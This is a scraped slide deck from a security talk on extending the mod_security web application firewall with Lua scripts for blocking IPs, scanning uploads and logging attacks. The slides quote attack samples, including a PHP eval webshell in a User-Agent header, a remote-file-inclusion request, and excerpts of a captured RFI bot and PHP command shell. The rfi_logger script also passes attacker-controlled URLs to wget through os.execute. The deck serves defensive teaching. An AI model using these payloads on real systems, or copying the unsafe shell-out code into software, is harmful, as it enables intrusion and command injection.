SlideShare ist ein Scribd-Unternehmen logo

Teaching Your WAF New Tricks

Robert Rowley
Robert Rowley

This isn’t your uncle’s “what’s a WAF” talk, I’ll be covering as many cool tricks and advance topics related to deploying Web Application Firewalls. I will show you how to write custom scripts using lua and mod_security, and give first hand experiences of how I used scripting with a WAF to put the security team at my previous job ahead of the game when dealing with web app attacks. I will be including the source code for these example scripts which can be used to provide automatic incident response, counter-intelligence and more.

Technologie
1 von 54
© 2012 Presented by: Teaching your WAF new tricks Robert Rowley Security Researcher rrowley@trustwave.com
© 2012 Disclaimer: The scripts contained in these slides are not recommended for you to use in production. If you get fired, it's your own fault. Harass me on twitter: @iamlei
© 2012 Agenda • Preamble – Writing a normal rule – Lua introduction – Scripting with: exec, @inspectFile, SecRuleScript • Counter Intelligence – RFI hunting/gathering – Malicious request intelligence collection – That WordPress Incident
© 2012 Why me?
© 2012 Mod sec intro  Write a rule  Block, Log, Repeat  Apache  IIS, Nginx (Beta)
© 2012 mod_sec variables REQUEST_BODY REQUEST_COOKIES REQUEST_FILENAME REQUEST_HEADERS REQUEST_LINE REQUEST_METHOD REQUEST_URI RESPONSE_BODY RESPONSE_HEADERS SCRIPT_FILENAME SCRIPT_USERNAME TIME ARGS ARGS_NAMES AUTH_TYPE ENV FILES FILES_NAMES FILES_SIZES QUERY_STRING REMOTE_ADDR REMOTE_HOST REMOTE_PORT REMOTE_USER ...AND BEYOND!
© 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ...
© 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 100” deny
© 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 1000” deny
© 2012© 2012 Adding Scripts!
© 2012 Which one is not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
© 2012 Which one is not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
© 2012 Another Normal Rule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny Blocks: 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00 HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>”
© 2012 Another Normal Rule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny
© 2012 Not So Normal Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny,exec:dirty_firewaller.lua
© 2012 A little lua intro  Object oriented (Everything is a table)  Light and easy  Available in other tools – Nmap – Wireshark – WoW
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:htaccess_firewaller.lua --- htaccess_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) local fh = io.open(“/path/to/.htaccess”, a+) fh:write(“deny from “..bad_ip) fh:close() end
© 2012 Using @inspectFile SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 SpiderLabs making it awesome • Implemented their own AV detection using ClamAV • It’s in the spiderlabs github • https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/ runav.pl
© 2012 Matching With Scripts SecRuleScript “check_blacklist.lua” deny
© 2012 Matching With Scripts SecRuleScript “check_blacklist.lua” deny --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
© 2012 Matching With Scripts SecRule REQUEST_URI “admin” deny,chain SecRuleScript “check_blacklist.lua” --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
© 2012 SpiderLabs making it awesome #2 “ipMatchFromFile” implemented in release 2.7 SecRule REQUEST_URI “admin” deny,chain SecRule ‘@ipMatchFromFile blacklist.txt’
© 2012© 2012 Counter Intelligence
© 2012 RFI Hunting 192.168.69.101 - - [08/Oct/2012:11:19:27 -0700] "GET /thumb.php?src=http://site.com/shell.txt HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Trivial to pull from logs
© 2012 RFI Hunting 192.168.69.101 - - [08/Oct/2012:11:12:43 -0700] "POST /thumb.php HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Problem …
© 2012 rfi_logger.lua SecRule ARGS “^http://” allow,exec:rfi_logger.lua function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") for j = 1, #args do if(string.match(args[j].value, 'http')) then fh = io.open("/tmp/backdoor", "a") fh:write("---"..ip.." "..url.." "..args[j].name.."="..args[j].value.."---n") fh:close() os.execute("wget –q –x -P /tmp/rfi_files/ '"..args[j].value) end end end
© 2012 <?php ###[ SEMBON CrEw SPREAD for RFIBot (2.3) ]### error_reporting(0); ##### CONFIG ##### $mode = $_GET["mode"]; $url = 'http://www.web-faq.jp/click_counter/data/.data/'; //URL path $src = $url.'cmd'; //Source Shell $shell = '404.php'; //Backdoor PHPShell name $bot = $url.'bot'; //Source PHPBot ##### SPREAD ##### ... die(base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Failed!'); //encode biar lebih optimal! } ... It works
© 2012 <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C> <H1>Changing this CMD will result in corrupt scanning !</H1> </html></head></body> <?php ... function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } ... It works
© 2012 Better than a blacklist 1) Capture Request 2) Log IP Malicious Request WAF script
© 2012 Better than a blacklist Request WAF script Unobstructed Response 1) Capture Request 2) Log All Data Malicious Host Unknown Host
© 2012 Put it together SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua
© 2012 Put it together SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua --- blacklist_ip.lua --- function main() local ip = m.getvar("REMOTE_ADDR") fh = io.open("blacklist.txt", "a") fh:write(ip.."n") fh:close() end
© 2012 Put it together SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua --- uber_logger.lua --- function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") local headers = m.getvars("REQUEST_HEADERS") local logstring = " " for j = 1, #headers do logstring = logstring.." "..headers[j].name.."="..headers[j].value end for j = 1, #args do logstring = logstring.." "..args[j].name.."="..args[j].value end fh = io.open("/tmp/uberlog", "a+") fh:write(ip.." "..url.." "..logstring.."n") fh:close() end
© 2012 Put it together Uberlog data 69.110.217.76 /index.php?arg=<script>alert(1);</script> REQUEST_HEADERS:User-Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:arg=<script>alert(1);</script> 69.110.217.76 /index.php?-s REQUEST_HEADERS:User- Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:-s=
© 2012 Data Mining Capture only on malicious requests Log far more data – REQUEST_HEADERS – POST variables – COOKIE data – FILES uploaded in the request – GeoIP information – Live data on the attack – Make pretty* graphs * OK they are not that pretty
© 2012 Graphs!
© 2012 Graphs!
© 2012 Graphs!
© 2012 The WordPress Incident (Monitoring Brute Force Attacks) “Massive” WordPress attack in early April 2013. Reported by several Hosting providers as reason for outages. A Mr. Brian K. blogged that it was a botnet recruiting run. Coincidentally: I had been monitoring wp-login.php requests with full data for months.
© 2012 The WordPress Incident (Why was I logging?) Someone* complained on twitter** Their logs looked like this: POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php They wanted to know more. * it was @Viss ** First time ever that complaining on twitter was beneficial, but not to the complainer.
© 2012 The WordPress Incident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua
© 2012 The WordPress Incident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=1admin x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=admins x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=webmaster x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=password x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=111111 x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=naruto
© 2012 The WordPress Incident (Data I got) Password list of the brute force Frequency of attacks against sites I controlled Passwords naruto pokemon 123456 admin Sitename123 etc... Correlated with the data from other researchers
© 2012 The WordPress Incident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
© 2012 The WordPress Incident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
© 2012 Bibliography/Questions?  http://www.modsecurity.org  http://www.lua.org  http://blog.spiderlabs.com SpiderLabs github  https://github.com/SpiderLabs You seriously want my code?  https://github.com/rawrly/ModSecScripts Take your pitchfork to me on twitter: @iamlei

Empfohlen

Dos attack
Dos attackDos attack
Dos attackSuraj Swarnakar
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfTeymur Kheirkhabarov
 
Denial of service
Denial of serviceDenial of service
Denial of servicegarishma bhatia
 
Windows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkWindows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkKapil Soni
 
File Sever
File SeverFile Sever
File SeverJagdeep Singh Malhi
 
Wireshark
WiresharkWireshark
WiresharkVijay kumar
 
IP tables and Filtering
IP tables and FilteringIP tables and Filtering
IP tables and FilteringAisha Talat
 
Denial of Service Attack
Denial of Service AttackDenial of Service Attack
Denial of Service AttackDhrumil Panchal
 

Empfohlen

Dos attack
Dos attackDos attack
Dos attackSuraj Swarnakar
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfTeymur Kheirkhabarov
 
Denial of service
Denial of serviceDenial of service
Denial of servicegarishma bhatia
 
Windows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkWindows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkKapil Soni
 
File Sever
File SeverFile Sever
File SeverJagdeep Singh Malhi
 
Wireshark
WiresharkWireshark
WiresharkVijay kumar
 
IP tables and Filtering
IP tables and FilteringIP tables and Filtering
IP tables and FilteringAisha Talat
 
Denial of Service Attack
Denial of Service AttackDenial of Service Attack
Denial of Service AttackDhrumil Panchal
 
Windows Hacking
Windows HackingWindows Hacking
Windows HackingMayur Sutariya
 
Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)btpsec
 
Linux forensics
Linux forensicsLinux forensics
Linux forensicsSantosh Khadsare
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attackKaustubh Padwad
 
Mirroring web site using ht track
Mirroring web site using ht trackMirroring web site using ht track
Mirroring web site using ht trackVishal Kumar
 
Wireshark - presentation
Wireshark - presentationWireshark - presentation
Wireshark - presentationKateryna Haskova
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Gaurav Sharma
 
Wireshark Tutorial
Wireshark TutorialWireshark Tutorial
Wireshark TutorialCoursenvy.com
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
How Internet Works
How Internet WorksHow Internet Works
How Internet WorksUrvi Talaty
 
Introduction to Tor
Introduction to TorIntroduction to Tor
Introduction to TorJaskaran Narula
 
Dns tunnelling its all in the name
Dns tunnelling its all in the nameDns tunnelling its all in the name
Dns tunnelling its all in the nameSecurity BSides London
 
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...Mikhail Egorov
 
Module 2 Foot Printing
Module 2 Foot PrintingModule 2 Foot Printing
Module 2 Foot Printingleminhvuong
 
Dns ppt
Dns pptDns ppt
Dns pptBizuworkk Jemaneh
 
CNIT 123: 6: Enumeration
CNIT 123: 6: EnumerationCNIT 123: 6: Enumeration
CNIT 123: 6: EnumerationSam Bowne
 
DNS Security
DNS SecurityDNS Security
DNS Securityjohnmcclure00
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kalin|u - The Open Security Community
 
Malware & Anti-Malware
Malware & Anti-MalwareMalware & Anti-Malware
Malware & Anti-MalwareArpit Mittal
 
FIRST CONNECTIONS
FIRST CONNECTIONSFIRST CONNECTIONS
FIRST CONNECTIONSAshok Mishra
 
Sebastian
SebastianSebastian
Sebastiansebastian davila velez
 

Weitere ähnliche Inhalte

Was ist angesagt?

Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)btpsec
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attackKaustubh Padwad
 
Mirroring web site using ht track
Mirroring web site using ht trackMirroring web site using ht track
Mirroring web site using ht trackVishal Kumar
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Gaurav Sharma
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
How Internet Works
How Internet WorksHow Internet Works
How Internet WorksUrvi Talaty
 
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...Mikhail Egorov
 
Module 2 Foot Printing
Module 2 Foot PrintingModule 2 Foot Printing
Module 2 Foot Printingleminhvuong
 
CNIT 123: 6: Enumeration
CNIT 123: 6: EnumerationCNIT 123: 6: Enumeration
CNIT 123: 6: EnumerationSam Bowne
 
Malware & Anti-Malware
Malware & Anti-MalwareMalware & Anti-Malware
Malware & Anti-MalwareArpit Mittal
 

Was ist angesagt? (20)

Windows Hacking
Windows HackingWindows Hacking
Windows Hacking
 
Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)
 
Linux forensics
Linux forensicsLinux forensics
Linux forensics
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
 
Mirroring web site using ht track
Mirroring web site using ht trackMirroring web site using ht track
Mirroring web site using ht track
 
Wireshark - presentation
Wireshark - presentationWireshark - presentation
Wireshark - presentation
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)
 
Wireshark Tutorial
Wireshark TutorialWireshark Tutorial
Wireshark Tutorial
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
How Internet Works
How Internet WorksHow Internet Works
How Internet Works
 
Introduction to Tor
Introduction to TorIntroduction to Tor
Introduction to Tor
 
Dns tunnelling its all in the name
Dns tunnelling its all in the nameDns tunnelling its all in the name
Dns tunnelling its all in the name
 
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
 
Module 2 Foot Printing
Module 2 Foot PrintingModule 2 Foot Printing
Module 2 Foot Printing
 
Dns ppt
Dns pptDns ppt
Dns ppt
 
CNIT 123: 6: Enumeration
CNIT 123: 6: EnumerationCNIT 123: 6: Enumeration
CNIT 123: 6: Enumeration
 
DNS Security
DNS SecurityDNS Security
DNS Security
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kali
 
Malware & Anti-Malware
Malware & Anti-MalwareMalware & Anti-Malware
Malware & Anti-Malware
 

Andere mochten auch

Orientação Sexual
Orientação SexualOrientação Sexual
Orientação SexualAndreiDiogo
 
111027 Diario La Nación
111027 Diario La Nación111027 Diario La Nación
111027 Diario La NaciónMintrabajo
 
Nimbus Ninjas Market Map
Nimbus Ninjas Market MapNimbus Ninjas Market Map
Nimbus Ninjas Market Mapnitnag
 
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...Juan Cruz Vega
 
SMejiaResume (1)
SMejiaResume (1)SMejiaResume (1)
SMejiaResume (1)Sarah Mejia
 
Rahul Prasad Art-4
Rahul Prasad Art-4Rahul Prasad Art-4
Rahul Prasad Art-4Rahul Prasad
 
CV S Sirkar 2016.docx
CV S Sirkar 2016.docx CV S Sirkar 2016.docx
CV S Sirkar 2016.docx Shahir Sirkar
 

Andere mochten auch (15)

FIRST CONNECTIONS
FIRST CONNECTIONSFIRST CONNECTIONS
FIRST CONNECTIONS
 
Sebastian
SebastianSebastian
Sebastian
 
Chapter 17
Chapter 17Chapter 17
Chapter 17
 
Tablettes
TablettesTablettes
Tablettes
 
Orientação Sexual
Orientação SexualOrientação Sexual
Orientação Sexual
 
Edifice Profile
Edifice ProfileEdifice Profile
Edifice Profile
 
Comunicado alumnos liceo 2
Comunicado alumnos liceo 2Comunicado alumnos liceo 2
Comunicado alumnos liceo 2
 
111027 Diario La Nación
111027 Diario La Nación111027 Diario La Nación
111027 Diario La Nación
 
The Word
The WordThe Word
The Word
 
Nimbus Ninjas Market Map
Nimbus Ninjas Market MapNimbus Ninjas Market Map
Nimbus Ninjas Market Map
 
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
 
Constante dieléctrica
Constante dieléctricaConstante dieléctrica
Constante dieléctrica
 
SMejiaResume (1)
SMejiaResume (1)SMejiaResume (1)
SMejiaResume (1)
 
Rahul Prasad Art-4
Rahul Prasad Art-4Rahul Prasad Art-4
Rahul Prasad Art-4
 
CV S Sirkar 2016.docx
CV S Sirkar 2016.docx CV S Sirkar 2016.docx
CV S Sirkar 2016.docx
 

Ähnlich wie Teaching Your WAF New Tricks

Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & ToolsIan Barber
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php PresentationAlan Pinstein
 
Building web framework with Rack
Building web framework with RackBuilding web framework with Rack
Building web framework with Racksickill
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareAlona Mekhovova
 
symfony on action - WebTech 207
symfony on action - WebTech 207symfony on action - WebTech 207
symfony on action - WebTech 207patter
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiJérémy Derussé
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmersrjsmelo
 
Profiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindProfiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindSam Keen
 
soft-shake.ch - Hands on Node.js
soft-shake.ch - Hands on Node.jssoft-shake.ch - Hands on Node.js
soft-shake.ch - Hands on Node.jssoft-shake.ch
 
Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2 Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2 3camp
 
node.js practical guide to serverside javascript
node.js practical guide to serverside javascriptnode.js practical guide to serverside javascript
node.js practical guide to serverside javascriptEldar Djafarov
 
Phing i Fabric - Budowanie i deployment aplikacji webowych
Phing i Fabric - Budowanie i deployment aplikacji webowychPhing i Fabric - Budowanie i deployment aplikacji webowych
Phing i Fabric - Budowanie i deployment aplikacji webowychleafnode
 
PHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source ProjectPHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source Projectxsist10
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: BackendVõ Duy Tuấn
 
Infrastructure = code - 1 year later
Infrastructure = code - 1 year laterInfrastructure = code - 1 year later
Infrastructure = code - 1 year laterChristian Ortner
 
Php web backdoor obfuscation
Php web backdoor obfuscationPhp web backdoor obfuscation
Php web backdoor obfuscationSandro Zaccarini
 
Ansible new paradigms for orchestration
Ansible new paradigms for orchestrationAnsible new paradigms for orchestration
Ansible new paradigms for orchestrationPaolo Tonin
 

Ähnlich wie Teaching Your WAF New Tricks (20)

Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & Tools
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php Presentation
 
Building web framework with Rack
Building web framework with RackBuilding web framework with Rack
Building web framework with Rack
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middleware
 
symfony on action - WebTech 207
symfony on action - WebTech 207symfony on action - WebTech 207
symfony on action - WebTech 207
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmers
 
Profiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindProfiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / Webgrind
 
soft-shake.ch - Hands on Node.js
soft-shake.ch - Hands on Node.jssoft-shake.ch - Hands on Node.js
soft-shake.ch - Hands on Node.js
 
Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2 Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2
 
node.js practical guide to serverside javascript
node.js practical guide to serverside javascriptnode.js practical guide to serverside javascript
node.js practical guide to serverside javascript
 
Phing i Fabric - Budowanie i deployment aplikacji webowych
Phing i Fabric - Budowanie i deployment aplikacji webowychPhing i Fabric - Budowanie i deployment aplikacji webowych
Phing i Fabric - Budowanie i deployment aplikacji webowych
 
WebGUI Developers Workshop
WebGUI Developers WorkshopWebGUI Developers Workshop
WebGUI Developers Workshop
 
PHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source ProjectPHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source Project
 
Write php deploy everywhere
Write php deploy everywhereWrite php deploy everywhere
Write php deploy everywhere
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: Backend
 
Infrastructure = code - 1 year later
Infrastructure = code - 1 year laterInfrastructure = code - 1 year later
Infrastructure = code - 1 year later
 
Php web backdoor obfuscation
Php web backdoor obfuscationPhp web backdoor obfuscation
Php web backdoor obfuscation
 
Ansible new paradigms for orchestration
Ansible new paradigms for orchestrationAnsible new paradigms for orchestration
Ansible new paradigms for orchestration
 

Mehr von Robert Rowley

WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)Robert Rowley
 
Detecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor SurveillanceDetecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor SurveillanceRobert Rowley
 
Privacy; Past, Present and Future
Privacy; Past, Present and FuturePrivacy; Past, Present and Future
Privacy; Past, Present and FutureRobert Rowley
 
Wordpress Security 101
Wordpress Security 101Wordpress Security 101
Wordpress Security 101Robert Rowley
 
State of Web App Security 2012
